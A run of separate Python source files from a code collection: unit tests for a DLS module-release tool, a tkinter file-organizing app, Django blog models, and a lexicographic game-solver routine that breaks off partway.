
    def test_python3_with_rhel_7_does_not_raise_error(self):
        areas = {"python3", "python3ext"}
        for area in areas:
            self.args.module_name = "module"
            self.args.release = "version"
            self.args.rhel_version = "7"
            self.args.area = area
            dls_release.check_parsed_arguments_valid(self.args, self.parser)
            self.mock_error.assert_not_called()

    def test_given_git_and_epics_area_else_good_options_then_error_not_raised(self):
        self.args.module_name = "module"
        self.args.release = "version"
        self.args.area = "epics"
        dls_release.check_parsed_arguments_valid(self.args, self.parser)
        self.assertFalse(self.mock_error.call_count)

    def test_given_git_and_matlab_area_else_good_options_then_error_not_raised(self):
        self.args.module_name = "module"
        self.args.release = "version"
        self.args.area = "matlab"
        dls_release.check_parsed_arguments_valid(self.args, self.parser)
        self.assertFalse(self.mock_error.call_count)

    def test_given_git_and_etc_area_and_Launcher(self):
        # "Launcher" is one of the two module names allowed in the etc area.
        self.args.module_name = "Launcher"
        self.args.release = "version"
        self.args.area = "etc"
        self.args.test_only = False
        self.args.skip_test = True
        self.args.local_build = False
        dls_release.check_parsed_arguments_valid(self.args, self.parser)
        self.mock_error.assert_not_called()

    def test_given_git_and_etc_area_and_init(self):
        # "init" is the other module name allowed in the etc area.
        self.args.module_name = "init"
        self.args.release = "version"
        self.args.area = "etc"
        self.args.test_only = False
        self.args.skip_test = True
        self.args.local_build = False
        dls_release.check_parsed_arguments_valid(self.args, self.parser)
        self.mock_error.assert_not_called()

    def test_given_etc_area_and_not_skip_local_test_build_then_error(self):
        self.args.module_name = "init"
        self.args.release = "version"
        self.args.area = "etc"
        self.args.test_only = False
        self.args.local_build = False
        # etc modules require -t (skip_test); leaving it False must fail.
        self.args.skip_test = False
        expected_error_message = \
            "Test builds are not possible for etc modules. " \
            "Use -t to skip the local test build. Do not use -T or -l."
        dls_release.check_parsed_arguments_valid(self.args, self.parser)
        self.mock_error.assert_called_once_with(expected_error_message)

    def test_given_etc_area_and_local_test_build_only_then_error(self):
        self.args.module_name = "init"
        self.args.release = "version"
        self.args.area = "etc"
        self.args.skip_test = False
        self.args.test_only = False
        # Requesting a local build (-l) is also forbidden for etc modules.
        self.args.local_build = True
        expected_error_message = \
            "Test builds are not possible for etc modules. " \
            "Use -t to skip the local test build. Do not use -T or -l."
        dls_release.check_parsed_arguments_valid(self.args, self.parser)
        self.mock_error.assert_called_once_with(expected_error_message)

    def test_given_etc_area_and_server_test_build_then_error(self):
        self.args.module_name = "init"
        self.args.release = "version"
        self.args.area = "etc"
        self.args.skip_test = True
        self.args.local_build = False
        # Not skip local test build
        self.args.test_only = True
        expected_error_message = \
            "Test builds are not possible for etc modules. " \
            "Use -t to skip the local test build. Do not use -T or -l."
        dls_release.check_parsed_arguments_valid(self.args, self.parser)
        self.mock_error.assert_called_once_with(expected_error_message)

    def test_given_git_and_etc_area_and_invalid_module_then_raise_error(self):
        # "redirector" is valid elsewhere but not in the etc area.
        self.args.module_name = "redirector"
        self.args.release = "version"
        self.args.area = "etc"
        self.args.test_only = False
        self.args.no_test_build = True
        self.args.local_build = False
        expected_error_message = \
            "The only supported etc modules are ['init', 'Launcher'] - " \
            "for others, use configure system instead"
        dls_release.check_parsed_arguments_valid(self.args, self.parser)
        self.mock_error.assert_called_once_with(expected_error_message)

    def test_given_git_and_tools_area_else_good_options_then_error_not_raised(self):
        self.args.module_name = "module"
        self.args.release = "version"
        self.args.area = "tools"
        dls_release.check_parsed_arguments_valid(self.args, self.parser)
        self.assertFalse(self.mock_error.call_count)
class TestNextVersionNumber(unittest.TestCase):
    """Tests for dls_release.next_version_number()."""

    def test_given_empty_list_of_releases_then_return_first_version_number(self):
        # With no prior releases, numbering starts at 0-1.
        self.assertEqual(dls_release.next_version_number([]), "0-1")

    def test_given_list_of_one_release_then_return_incremented_latest_version_number(self):
        self.assertEqual(dls_release.next_version_number(['5-5']), '5-6')

    def test_given_list_of_complex_releases_then_return_incremented_latest_version_number(self):
        existing = ['1-3-5dls7', '2-3-5dls7', '2-3-4dls8', '2-3-5dls8']
        # Latest is 2-3-5dls8; its most minor component is incremented.
        self.assertEqual(dls_release.next_version_number(existing), '2-3-5dls9')
class TestGetLastRelease(unittest.TestCase):
    """Tests for dls_release.get_last_release()."""

    def test_given_list_of_one_release_number_then_return_that_number(self):
        only_release = ['1-5-3-4']
        self.assertEqual(dls_release.get_last_release(only_release), only_release[0])

    def test_given_list_of_releases_with_diff_major_number_then_return_latest_version(self):
        unordered = ['1-0', '3-0', '2-0']
        # '3-0' is the highest even though it is not last in the list.
        self.assertEqual(dls_release.get_last_release(unordered), unordered[1])

    def test_given_list_of_complex_releases_then_return_latest_version(self):
        complex_releases = ['1-3-5dls7', '2-3-5dls7', '2-3-4dls8', '2-3-5dls8']
        self.assertEqual(dls_release.get_last_release(complex_releases), complex_releases[-1])
class TestFormatArgumentVersion(unittest.TestCase):
    """Tests for dls_release.format_argument_version()."""

    def test_given_string_arg_with_periods_then_return_same_string_with_dashes(self):
        dotted = '1.4.3dls5'
        converted = dls_release.format_argument_version(dotted)
        # Same length, no dots remain, and dash-split fields line up with
        # the original dot-split fields.
        self.assertEqual(len(converted), len(dotted))
        self.assertFalse('.' in converted)
        self.assertEqual(dotted.split('.'), converted.split('-'))

    def test_given_empty_string_arg_then_return_empty_string(self):
        self.assertEqual('', dls_release.format_argument_version(''))

    def test_given_string_arg_with_no_dots_return_same_string(self):
        # Already dash-formatted input passes through unchanged.
        self.assertEqual('1-4', dls_release.format_argument_version('1-4'))
class TestIncrementVersionNumber(unittest.TestCase):
    """Tests for dls_release.increment_version_number()."""

    def test_given_single_digit_then_return_incremented_digit(self):
        self.assertEqual(dls_release.increment_version_number('4'), '5')

    def test_given_two_digit_then_return_number_with_most_minor_digit_incremented(self):
        self.assertEqual(dls_release.increment_version_number('4-5'), '4-6')

    def test_given_dls_release_number_then_return_with_incremented_most_minor_number(self):
        # Only the trailing numeric component changes.
        self.assertEqual(dls_release.increment_version_number('4-5dls12'), '4-5dls13')
class TestConstructInfoMessage(unittest.TestCase):
    """Tests for dls_release.construct_info_message().

    A real build object is produced via create_build_object() with the
    build server name patched, so the expected message text can be built
    from the same build object the function under test receives.
    """

    def setUp(self):
        # Contact lookups would reach out to external services; stub them.
        self.mock_lookup_contact_details = set_up_mock(
            self, 'dls_ade.dlsbuild.lookup_contact_details'
        )

    @patch('dls_ade.dlsbuild.default_server', return_value='redhat6-x86_64')
    def test_given_default_args_then_construct_specific_string(self, _1):
        module = 'dummy'
        version = '1-0'
        branch = None
        area = "support"
        options = FakeOptions()
        build = dls_release.create_build_object(options)
        # With no branch, the message references the tag.
        expected_message = '{module} {version} from tag {version}, '.format(module=module, version=version)
        expected_message += 'using {} build server'.format(build.get_server())
        expected_message += ' and epics {}'.format(build.epics())
        returned_message = dls_release.construct_info_message(
            module, branch, area, version, build)
        self.assertEqual(expected_message, returned_message)

    @patch('dls_ade.dlsbuild.default_server', return_value='redhat6-x86_64')
    def test_given_default_args_and_branch_then_construct_specific_string_referencing_branch(self, _1):
        module = 'dummy'
        version = '3-5'
        branch = 'new_feature'
        area = 'support'
        options = FakeOptions(branch='new_feature')
        build = dls_release.create_build_object(options)
        # With a branch, the message says "from branch <name>" instead.
        expected_message = \
            '{module} {version} from branch {branch}, '.format(module=module, version=version, branch=branch)
        expected_message += 'using {} build server'.format(build.get_server())
        expected_message += ' and epics {}'.format(build.epics())
        returned_message = dls_release.construct_info_message(
            module, branch, area, version, build)
        self.assertEqual(expected_message, returned_message)

    @patch('dls_ade.dlsbuild.default_server', return_value='redhat6-x86_64')
    def test_given_default_args_and_ioc_area_then_construct_specific_string(self, _1):
        # ioc area behaves like support: the epics version is included.
        module = 'dummy'
        version = '1-0'
        area = 'ioc'
        branch = None
        options = FakeOptions(area='ioc')
        build = dls_release.create_build_object(options)
        expected_message = '{module} {version} from tag {version}, '.format(module=module, version=version)
        expected_message += 'using {} build server'.format(build.get_server())
        expected_message += ' and epics {}'.format(build.epics())
        returned_message = dls_release.construct_info_message(
            module, branch, area, version, build)
        self.assertEqual(expected_message, returned_message)

    @patch('dls_ade.dlsbuild.default_server', return_value='redhat6-x86_64')
    def test_if_area_not_support_or_ioc_then_return_string_without_epics_specified(self, _1):
        module = 'dummy'
        version = '1-0'
        branch = None
        area = 'python'
        options = FakeOptions(area='python')
        build = dls_release.create_build_object(options)
        returned_message = dls_release.construct_info_message(
            module, branch, area, version, build)
        # Non-EPICS areas omit any mention of the epics version.
        self.assertFalse('epics' in returned_message)
        self.assertFalse(build.epics() in returned_message)
class TestCheckEpicsVersion(unittest.TestCase):
    """Tests for dls_release.check_epics_version_consistent()."""

    def test_given_epics_option_then_return_true(self):
        # An explicit epics option always wins, even when it matches
        # neither the module's nor the build server's version.
        e_module = 'some_epics_version'
        e_option = 'specified_epics_version'
        e_build = 'some_other_epics_version'
        sure = dls_release.check_epics_version_consistent(
            e_module, e_option, e_build)
        self.assertTrue(sure)

    @patch('dls_ade.dls_release.ask_user_input', return_value='n')
    def test_given_no_epics_option_and_mismatched_module_and_build_epics_then_ask_user_for_input(self, mock_ask):
        e_option = None
        e_module = 'specified_epics_version'
        e_build = 'some_other_epics_version'
        # The return value is intentionally ignored (the previously unused
        # `sure` binding was removed); this test only checks that the
        # user is consulted about the mismatch.
        dls_release.check_epics_version_consistent(
            e_module, e_option, e_build)
        mock_ask.assert_called_once_with(ANY)

    def test_given_no_epics_option_and_matching_module_and_build_epics_then_return_true(self):
        e_option = None
        e_module = 'specified_epics_version'
        e_build = 'specified_epics_version'
        sure = dls_release.check_epics_version_consistent(
            e_module, e_option, e_build)
        self.assertTrue(sure)

    @patch('dls_ade.dls_release.ask_user_input', return_value='n')
    def test_given_no_epics_option_and_matching_module_and_build_epics_except_build_specifies_64bit_then_return_true(self, mock_ask):
        # A trailing _64 on the build's version is not a mismatch.
        e_option = None
        e_module = 'R3.14.11'
        e_build = 'R3.14.11_64'
        sure = dls_release.check_epics_version_consistent(
            e_module, e_option, e_build)
        self.assertFalse(mock_ask.call_count, "shouldn't have called ask_user_input()")
        self.assertTrue(sure)
class TestGetModuleEpicsVersion(unittest.TestCase):
    """Tests for dls_release.get_module_epics_version()."""

    def test_given_vcs_object_can_return_filecontents_with_epics_version_mentioned_then_return_epics_version(self):
        # FakeVcs.cat() serves a RELEASE file containing R3.14.12.3.
        expected_epics = 'R3.14.12.3'
        module_epics = dls_release.get_module_epics_version(FakeVcs())
        self.assertEqual(module_epics, expected_epics)

    def test_given_vcs_object_can_return_filecontents_without_epics_version_mentioned_then_return_empty_list(self):
        # Renamed from `FakeVcs`: the local previously shadowed the
        # module-level FakeVcs helper class.
        fake_vcs = MagicMock()
        fake_vcs.cat.return_value = 'BLGUI = $(SUPPORT)/BLGui/3-5'
        module_epics = dls_release.get_module_epics_version(fake_vcs)
        self.assertFalse(len(module_epics))
class TestPerformTestBuild(unittest.TestCase):
    """Tests for dls_release.perform_test_build().

    The build object is a MagicMock so each test can script whether a
    local test build is possible and whether it succeeds (test() -> 0)
    or fails (test() -> non-zero). perform_test_build() returns a
    (message, test_failed) pair.
    """

    def setUp(self):
        self.fake_build = MagicMock()

    def test_given_any_option_when_called_then_return_string_and_test_failure_bool(self):
        local_build = False
        module, version = 'test', '1-2-3'
        test_message, test_fail = dls_release.perform_test_build(
            self.fake_build, local_build, module, version, FakeVcs())
        self.assertIsInstance(test_message, str)
        self.assertIsInstance(test_fail, bool)

    def test_given_local_test_build_not_possible_when_called_then_return_specific_string(self):
        local_build = False
        module, version = 'test', '1-2-3'
        # Simulate a local OS that differs from the build server's.
        self.fake_build.local_test_possible = MagicMock(return_value=False)
        expected_message = "Local test build not possible since local system "
        expected_message += "not the same OS as build server"
        test_message, test_fail = dls_release.perform_test_build(
            self.fake_build, local_build, module, version, FakeVcs())
        self.assertEqual(test_message, expected_message)

    def test_given_local_test_build_possible_then_returned_string_begins_with_specific_string(self):
        local_build = False
        module, version = 'test', '1-2-3'
        expected_message = "Performing test build on local system"
        test_message, test_fail = dls_release.perform_test_build(
            self.fake_build, local_build, module, version, FakeVcs())
        self.assertTrue(
            test_message.startswith(expected_message),
            "returned message does not start with expected string")

    def test_given_local_test_possible_and_build_fails_then_return_test_failed(self):
        local_build = False
        module, version = 'test', '1-2-3'
        # Non-zero return from build.test() signals a failed test build.
        self.fake_build.test.return_value = 1
        test_message, test_fail = dls_release.perform_test_build(
            self.fake_build, local_build, module, version, FakeVcs())
        self.assertTrue(test_fail)

    def test_given_local_test_possible_then_test_build_performed_once_with_vcs_and_version_as_args(self):
        local_build = False
        version = '0-1'
        module = 'test'
        vcs = FakeVcs(version=version)
        self.fake_build.test.return_value = 1
        dls_release.perform_test_build(self.fake_build, local_build, module, version, vcs)
        self.fake_build.test.assert_called_once_with(module, version, vcs)

    def test_given_test_possible_and_build_works_then_return_test_not_failed_and_message_ends_with_specific_string(self):
        local_build = False
        module, version = 'test', '1-2-3'
        self.fake_build.test.return_value = 0
        # When not a local-only build, the message announces the follow-up
        # server submission.
        expected_message_end = "Test build successful. Continuing with build"
        expected_message_end += " server submission"
        test_message, test_fail = dls_release.perform_test_build(
            self.fake_build, local_build, module, version, FakeVcs())
        self.assertFalse(test_fail)
        self.assertTrue(
            test_message.endswith(expected_message_end),
            "returned message does not end with expected string")

    def test_given_test_possible_and_build_works_and_local_build_option_then_message_ends_without_continuation_info(self):
        # Local-only build: no "continuing with server submission" suffix.
        local_build = True
        module, version = 'test', '1-2-3'
        self.fake_build.test.return_value = 0
        expected_message = "Performing test build on local system"
        expected_message += '\nTest build successful.'
        test_message, test_fail = dls_release.perform_test_build(
            self.fake_build, local_build, module, version, FakeVcs())
        self.assertEqual(test_message, expected_message)
class TestDetermineVersionToRelease(unittest.TestCase):
    """Tests for dls_release.determine_version_to_release() and (at the
    end of this class) dls_release.normalise_release().

    determine_version_to_release(release, area, next_version, releases,
    commit=...) returns a (version, commit_to_release) pair;
    commit_to_release is None when an existing tag is to be released.
    """

    def setUp(self):
        self.release = '0-1'
        self.releases = ['0-1']
        self.commit = 'abcdef'

    def test_determine_version_to_release_allows_invalid_version_name(self):
        # This is no longer checked in this function.
        dls_release.determine_version_to_release(
            'invalid-release',
            'area',
            False,
            ['invalid-release']
        )

    def test_determine_version_to_release_allows_commit_but_no_version(self):
        # A warning is printed but the release continues.
        version, commit_to_release = dls_release.determine_version_to_release(
            None,
            'area',
            False,
            ['invalid-release'],
            commit=self.commit
        )
        # The commit hash itself is used as the version string.
        self.assertEqual(version, self.commit)
        self.assertEqual(commit_to_release, None)

    def test_determine_version_to_release_allows_commit_and_version(self):
        version, commit_to_release = dls_release.determine_version_to_release(
            self.release,
            'area',
            False,
            ['invalid-release'],
            commit=self.commit
        )
        self.assertEqual(version, self.release)
        self.assertEqual(commit_to_release, self.commit)

    def test_determine_version_to_release_raises_ValueError_if_release_not_in_releases(self):
        # Releasing an existing tag requires that tag to be in the list.
        with self.assertRaises(ValueError):
            dls_release.determine_version_to_release(
                self.release,
                'area',
                False,
                []
            )

    def test_determine_version_to_release_raises_ValueError_if_commit_specified_but_tag_exists(self):
        # A commit cannot be released under a version that is already tagged.
        with self.assertRaises(ValueError):
            dls_release.determine_version_to_release(
                self.release,
                'area',
                False,
                self.releases,
                commit=self.commit
            )

    def test_determine_version_to_release_returns_release_and_None_if_no_commit_specified(self):
        version, commit_to_release = dls_release.determine_version_to_release(
            self.release,
            'area',
            False,
            self.releases
        )
        self.assertEqual(version, '0-1')
        self.assertEqual(commit_to_release, None)

    def test_determine_version_to_release_returns_next_version_and_HEAD_if_next_version_specified(self):
        # next_version=True: bump the latest release and build from HEAD.
        version, commit_to_release = dls_release.determine_version_to_release(
            None,
            'area',
            True,
            self.releases
        )
        self.assertEqual(version, '0-2')
        self.assertEqual(commit_to_release, 'HEAD')

    def test_determine_version_to_release_returns_hash_if_only_commit_specified(self):
        version, commit_to_release = dls_release.determine_version_to_release(
            None,
            'area',
            False,
            self.releases,
            commit=self.commit
        )
        self.assertEqual(version, self.commit)
        self.assertEqual(commit_to_release, None)

    # The remaining tests exercise dls_release.normalise_release().

    def test_normalise_release_returns_valid_release(self):
        old_release = '1-1'
        new_release = dls_release.normalise_release(old_release, 'support')
        self.assertEqual(old_release, new_release)

    def test_normalise_release_replaces_dot_with_dash(self):
        old_release = '1.1'
        new_release = dls_release.normalise_release(old_release, 'python')
        self.assertEqual(new_release, '1-1')

    def test_normalise_release_raises_ValueError_if_release_not_valid(self):
        with self.assertRaises(ValueError):
            dls_release.normalise_release('1.1abc3', 'ioc')
        with self.assertRaises(ValueError):
            dls_release.normalise_release('aaa', 'ioc')
class FakeOptions(object):
    """Stand-in for a parsed command-line argument object.

    Any keyword passed to the constructor overrides the matching default
    below; unrecognised keywords are silently ignored, exactly as in the
    original attribute-by-attribute implementation.
    """

    def __init__(self, **kwargs):
        defaults = {
            'rhel_version': None,
            'epics_version': None,
            'windows': None,
            'area': 'support',
            'force': None,
            'git': False,
            'branch': None,
            'next_version': None,
            'skip_test': False,
            'local_build': False,
        }
        for name, default in defaults.items():
            setattr(self, name, kwargs.get(name, default))
class FakeVcs(object):
    """Minimal VCS stub: remembers a version and serves a canned
    configure/RELEASE file from cat()."""

    def __init__(self, **kwargs):
        # Same default as the original: version is None unless supplied.
        self.version = kwargs.get('version', None)

    def cat(self, filename, version=None):
        """Return fixed RELEASE-style file contents, ignoring *filename*."""
        return '''
CALC = $(SUPPORT)/calc/3-1
BLGUI = $(SUPPORT)/BLGui/3-5
# If using the sequencer, point SNCSEQ at its top directory:
#SNCSEQ=$(EPICS_BASE)/../modules/soft/seq
# EPICS_BASE usually appears last so other apps can override stuff:
EPICS_BASE=/dls_sw/epics/R3.14.12.3/base
# Set RULES here if you want to take build rules from somewhere
# other than EPICS_BASE:
#RULES=/path/to/epics/support/module/rules/x-y
'''
if __name__ == '__main__':
    # buffer option suppresses stdout generated from tested code
    # (captured output is only replayed for failing tests)
    unittest.main(buffer=True)
| StarcoderdataPython |
9709453 | import os
import shutil
import tkinter
from tkinter import Button, Entry, Frame, Label, Listbox, OptionMenu, StringVar, filedialog
from tkinter.constants import BOTTOM, END, TOP
import time
def organiser_app_window():
    """Build and run the "organize it" Tk window.

    Lets the user pick a folder, then copies, moves, or symlinks every
    file found in it (recursively) into per-extension subfolders created
    under the chosen folder.

    Fixes over the previous version:
    - The traversal loops removed items from the list being iterated
      (``for folder in subfolders: subfolders.remove(folder)``), which
      silently skipped entries; an explicit work queue is used instead.
    - The three near-identical copy/move/shortcut routines now share one
      traversal and one transfer driver.
    - The "create shortcut" button no longer shadows the "move" button's
      ``b3`` variable.
    """
    mainscreen = tkinter.Tk()
    mainscreen.title("organize it")
    # Kept global for backward compatibility with any external readers.
    global scvalue, file_path, result, options

    def _scan(main_folder, skip_name=None):
        """Breadth-first walk of *main_folder*.

        Returns ``(folders, extensions)``: every directory encountered
        (including *main_folder* itself) and the extension of every file
        seen. A directory called *skip_name* directly under
        *main_folder* is skipped so previously organised output is not
        processed again.
        """
        pending = [main_folder]
        folders = []
        extensions = []
        while pending:
            folder = pending.pop(0)
            folders.append(folder)
            for entry in os.listdir(folder):
                full_path = os.path.join(folder, entry)
                if os.path.isdir(full_path):
                    if skip_name and folder == main_folder and entry == skip_name:
                        continue
                    pending.append(full_path)
                else:
                    # "Extension" is simply whatever follows the last dot.
                    extensions.append(entry.split('.')[-1])
        return folders, extensions

    def _make_dest_dirs(main_folder, dest_name, extensions):
        """Create <main_folder>/<dest_name>/<ext> for every extension."""
        dest_root = os.path.join(main_folder, dest_name)
        if not os.path.isdir(dest_root):
            os.mkdir(dest_root)
        for ext in extensions:
            ext_dir = os.path.join(dest_root, ext)
            if not os.path.isdir(ext_dir):
                os.mkdir(ext_dir)

    def _each_file(folders):
        """Yield (folder, file_name, extension) for every plain file."""
        for folder in folders:
            for entry in os.listdir(folder):
                if not os.path.isdir(os.path.join(folder, entry)):
                    yield folder, entry, entry.split('.')[-1]

    def _transfer_files(main_folders, transfer, done_word, deny_word, err_word):
        """Shared driver for the copy and move buttons.

        *transfer* is shutil.copy or shutil.move; the *_word* arguments
        customise the per-file status messages shown in the listbox.
        """
        try:
            main_folder = f"{main_folders}".replace("\\", "/")
            folders, extensions = _scan(main_folder, skip_name="types of file")
            _make_dest_dirs(main_folder, "types of file", extensions)
            for src_folder, file, ext in _each_file(folders):
                src_folder = src_folder.replace("\\", "/")
                try:
                    transfer(f"{src_folder}/{file}",
                             f"{main_folder}/types of file/{ext}/{file}")
                    results.insert(END, f"{file} {done_word} successfully")
                except shutil.SameFileError:
                    results.insert(END, f"{file} already exist")
                except PermissionError:
                    results.insert(END, f"{deny_word} file {file} permission denied")
                except Exception:
                    results.insert(END, f"ERROR! unable to {err_word}")
                # Keep the UI responsive while the transfer loop runs.
                mainscreen.update()
            process.set("process has been done.\n you can exit the app now")
            process_completed.update()
        except Exception:
            process.set("failed! check folder is selected")

    def copy_files_as_extention(main_folders):
        """Copy every file into per-extension folders under "types of file"."""
        _transfer_files(main_folders, shutil.copy, "copied", "coping", "copy")

    def move_files_as_extention(main_folders):
        """Move every file into per-extension folders under "types of file"."""
        _transfer_files(main_folders, shutil.move, "moved", "moving", "move")

    def create_shortcut_file(main_folders):
        """Create symlinks to every file under "types of shortcut file".

        Creating symlinks on Windows may require administrator rights,
        hence the extra hint in the failure messages.
        """
        try:
            main_folder = f"{main_folders}"
            folders, extensions = _scan(main_folder, skip_name="types of shortcut file")
            _make_dest_dirs(main_folder, "types of shortcut file", extensions)
            for src_folder, file, ext in _each_file(folders):
                try:
                    os.symlink(
                        os.path.join(src_folder, file),
                        os.path.join(main_folder, "types of shortcut file",
                                     ext, f"shortcut_{file}"))
                    results.insert(END, f"{file} shortcut created successfully")
                except Exception:
                    results.insert(END, f"ERROR! unable to make shortcut or run as administrator")
                mainscreen.update()
            process.set("process has been done.\n you can exit the app now")
            process_completed.update()
        except Exception:
            process.set("failed! check folder is selected\n or run as administrator")

    # Kept for backward compatibility; not read by this window itself.
    options = ["all files"]

    def open_file():
        """Ask the user for a folder, remember it and refresh the widgets."""
        file_path = filedialog.askdirectory(title='select file')
        file_path = file_path.replace("/", "\\")
        scvalue.set(file_path)
        folder_path.set(file_path)
        view_bar.update()
        b2.update()
        b3.update()
        b4.update()
        try:
            # Walk the selection once so an unreadable/unset folder is
            # reported immediately (the scan result itself is not needed).
            _scan(file_path)
            mainscreen.update()
            process.set("folder has been selected")
            process_completed.update()
        except Exception:
            process.set("failed! check folder is selected")

    note = Label(mainscreen, text="💐welcome! to the app 🎇🎉💐\n\n steps:\n\n 1. select folder by clicking select folder button\n 2. click copy or move button to copy or move\n 3. look the bottom bars to check results and processes\n NOTE: I RECOMEND YOU TO USE COPY METHOD 😁", font="algerian 14 italic")
    note.pack(side=TOP)

    folder_path = StringVar()
    scvalue = StringVar()
    view_bar = Entry(mainscreen, text=scvalue, state="readonly", border="10", width="100")
    view_bar.pack()

    def folder_open():
        """Open the currently selected folder in the system file browser."""
        os.startfile(folder_path.get())

    f1 = Frame(mainscreen)
    b1 = Button(f1, text="select folder", fg="black", command=open_file, border="10", font="algerian 12 bold")
    b1.grid(row=0, columnspan=2)
    b4 = Button(f1, text="open folder", command=folder_open, border="10", justify="center", font="algerian 12 bold", bg="aqua")
    b4.grid(row=1, columnspan=2)
    b2 = Button(f1, text="copy and arrange\n folder", bg="green", fg="white", command=lambda: copy_files_as_extention(folder_path.get()), border="10", justify="center", font="algerian 12 bold")
    b2.grid(row=2, column=0)
    b3 = Button(f1, text="move and arrange\n folder", bg="red", fg="white", command=lambda: move_files_as_extention(folder_path.get()), border="10", justify="center", font="algerian 12 bold")
    b3.grid(row=2, column=1)
    # Renamed from b3: the shortcut button previously shadowed the move button.
    b5 = Button(f1, text="create shortcut\n and arrange\n folder", padx="100", bg="orange", fg="white", command=lambda: create_shortcut_file(folder_path.get()), border="10", justify="center", font="algerian 12 bold")
    b5.grid(row=3, columnspan=2)
    f1.pack()

    f2 = Frame(mainscreen)
    result = StringVar()  # kept for backward compatibility; unused here
    res = Label(f2, text="processes:", font="algerian 15 bold")
    res.grid(row=0, column=0)
    results = Listbox(f2, border="8", width="80", height="20", justify="left", fg="red", font="algerian 8 bold")
    results.grid(row=0, column=1)
    pros = Label(f2, text="result:", font="algerian 15 bold")
    pros.grid(row=1, column=0)
    process = StringVar()
    process_completed = Entry(f2, text=process, border="10", width="40", justify="left", fg="green", font="algerian 16 bold")
    process_completed.grid(row=1, column=1)
    f2.pack(side=BOTTOM)

    mainscreen.mainloop()
if __name__ == "__main__":
organiser_app_window() | StarcoderdataPython |
3470308 | <reponame>JiangNanMax/mysite
from django.db import models
from django.contrib.auth.models import User
from django.contrib.contenttypes.fields import GenericRelation
from ckeditor.fields import RichTextField
from read_statistics.models import ReadNumExpandMethod, ReadDetail
##
from mdeditor.fields import MDTextField
# Create your models here.
class BlogType(models.Model):
    """A category label that blog posts are grouped under."""
    # Human-readable category name shown in the admin and on the site.
    type_name = models.CharField(max_length=20)

    def __str__(self):
        return self.type_name
class Blog(models.Model, ReadNumExpandMethod):
    """A blog post, written in Markdown, with per-post read statistics.

    Inherits read-count helpers from ReadNumExpandMethod and links read
    events through the generic ``read_details`` relation.
    """
    title = models.CharField(max_length=50)
    blog_type = models.ForeignKey(BlogType, on_delete=models.CASCADE)
    #content = RichTextField()
    content = MDTextField()
    author = models.ForeignKey(User, on_delete=models.CASCADE)
    read_details = GenericRelation(ReadDetail)
    created_time = models.DateTimeField(auto_now_add=True)
    # BUG FIX: was auto_now_add=True, which sets the timestamp only once at
    # creation. auto_now=True refreshes it on every save(), which is what a
    # "last updated" field is meant to record.
    last_updated_time = models.DateTimeField(auto_now=True)

    def __str__(self):
        return "<Blog: %s>" % self.title

    class Meta:
        # Newest posts first by default.
        ordering = ['-created_time']
| StarcoderdataPython |
8092010 | <filename>src/udgs/models/solve_lexicographic_pg.py
from udgs.models.forces_utils import ForcesException
import numpy as np
from udgs.models.forces_def import params, p_idx
from udgs.models.forces_def.car_util import set_p_car
def solve_optimization(model, solver, n_players, problem, behavior,
                       k: int, lex_level, next_spline_points,
                       solver_it, solver_time, solver_cost,
                       opt_cost1, opt_cost2):
    """
    Solve one NLP at the given lexicographic level.

    model: model settings
    solver: compiled solver
    n_players: number of players involved in the game
    problem: problem definition, contains xinit, x0, all_params for the solver
    behavior: parameters for the cost function
    k: current index in the simulation
    lex_level: lexicographic level
    next_spline_points: spline points for the player
    solver_it, solver_time, solver_cost: arrays for keeping track of solver info
    opt_cost1, opt_cost2: terminal costs for cumulative slack and cumulative rules

    Returns (output, problem, p_vector).
    Raises ForcesException for any solver failure other than a (recoverable)
    stalled line search (exitflag -7).
    """
    # Set runtime parameters (the only ones really changing between stages
    # are the next control points of the spline).
    p_vector = set_p_car(
        SpeedLimit=behavior[p_idx.SpeedLimit],
        TargetSpeed=behavior[p_idx.TargetSpeed],
        OptCost1=opt_cost1,
        OptCost2=opt_cost2,
        Xobstacle=behavior[p_idx.Xobstacle],
        Yobstacle=behavior[p_idx.Yobstacle],
        TargetProg=behavior[p_idx.TargetProg],
        kAboveTargetSpeedCost=behavior[p_idx.kAboveTargetSpeedCost],
        kBelowTargetSpeedCost=behavior[p_idx.kBelowTargetSpeedCost],
        kAboveSpeedLimit=behavior[p_idx.kAboveSpeedLimit],
        kLag=behavior[p_idx.kLag],
        kLat=behavior[p_idx.kLat],
        pLeftLane=behavior[p_idx.pLeftLane],
        kReg_dAb=behavior[p_idx.kReg_dAb],
        kReg_dDelta=behavior[p_idx.kReg_dDelta],
        carLength=behavior[p_idx.carLength],
        minSafetyDistance=behavior[p_idx.minSafetyDistance],
        kSlack=behavior[p_idx.kSlack],
        points=next_spline_points[:, :, k],
        n_players=n_players
    )
    problem["all_parameters"] = np.tile(p_vector, (model.N,))
    n_states = params.n_states
    n_inputs = params.n_inputs
    # Time to solve the NLP!
    output, exitflag, info = solver.solve(problem)
    # Make sure the solver has exited properly.
    if exitflag < 0:
        if exitflag == -7:
            # Stalled line search: try to repair the initial guess and re-solve.
            for player in range(n_players):
                # It makes sure that progress is correctly initialized (i.e. bigger than TargetProgress)
                problem['x0'][-3 - n_states * player] = behavior[p_idx.TargetProg] + 1
                # It makes sure that cumulative costs are not < 0.
                # BUG FIX: the per-player entries are checked, so the same
                # per-player entries must be reset; the original always
                # overwrote x0[-2]/x0[-1], i.e. only the first player's.
                if problem['x0'][-2 - n_states * player] < 0:
                    problem['x0'][-2 - n_states * player] = 0
                if problem['x0'][-1 - n_states * player] < 0:
                    problem['x0'][-1 - n_states * player] = 0
            output, exitflag, info = solver.solve(problem)
            if exitflag == -7:
                # Still stalled: reinitialize the whole decision vector from xinit.
                xinit = problem['xinit']
                initialization = np.tile(np.append(np.zeros(n_inputs * n_players), xinit), model.N)
                problem["x0"] = initialization
                output, exitflag, info = solver.solve(problem)
                if exitflag == -7:
                    print(f"Stalled line search at simulation step {k}, check solver initialization")
            solver_it[k, lex_level] = info.it
            solver_time[k, lex_level] = info.solvetime
            solver_cost[k, lex_level] = info.pobj
        else:
            print(f"At simulation step {k}")
            raise ForcesException(exitflag)
    else:
        solver_it[k, lex_level] = info.it
        solver_time[k, lex_level] = info.solvetime
        solver_cost[k, lex_level] = info.pobj
    return output, problem, p_vector
def solve_lexicographic(model, solver, num_players, problem,
                        behavior_init, behavior_first, behavior_second, behavior_third,
                        k: int, lexi_iter, next_spline_points,
                        solver_it_lexi, solver_time_lexi, solver_cost_lexi,
                        sim_params):
    """
    Run one simulation step of the lexicographic game: solve up to
    ``lexi_iter`` NLPs in sequence, each level constraining the next via
    the cumulative costs extracted from the previous solution.

    model: model settings
    solver: compiled solver
    num_players: number of players involved in the game
